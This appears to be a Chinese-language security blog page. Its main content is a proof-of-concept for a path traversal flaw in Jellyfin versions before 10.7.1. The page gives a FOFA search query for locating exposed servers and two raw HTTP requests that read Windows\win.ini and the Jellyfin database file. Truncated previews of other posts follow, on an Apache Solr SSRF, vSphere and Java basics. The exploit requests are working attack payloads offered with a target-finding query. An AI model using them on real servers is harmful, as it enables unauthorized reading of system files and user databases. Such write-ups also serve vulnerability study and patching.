影响版本： Jellyfin<10.7.1 复现 fofa语法 1 title="Jellyfin" POC 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 # poc_1 GET /Audio/1/hls/..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini/stream.mp3/ Host:xxx.xxx.xxx.xxx Content-Type: application/octet-stream # poc_2 GET /Audio/anything/hls/..%5Cdata%5Cjellyfin.db/stream.mp3/ HTTP/1.1 Host: x.x.x.x:5577 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)

前言 Apache Solr是一个开源的搜索服务，使用Java语言开发，基于Lucene的全文搜索服务器。 Apache Solr全版本存在一个SSRF与任意文件读取漏

简介 vSphere 是 VMware 推出的虚拟化平台套件，包含 ESXi、vCenter Server 等一系列的软件。其中 vCenter Server 为 ESXi 的控制中心，可从单一控制点统一管理数据中心的所有 vSphere

Java反射机制概述 Reflection（反射）是被视为动态语言的关键，反射机制允许程序在执行期借助于Reflection API取得任何类的

网络编程概述 Java提供的网络类库，可以实现无痛的网络连接，联网的底层细节被l隐藏在 Java的本机安装系统里，由JVM进行控制。并且Java

String类 基础知识 String类: 代表字符串。Java程序中的所有字符串字面值（如"abc"）都作为此类的实例实现。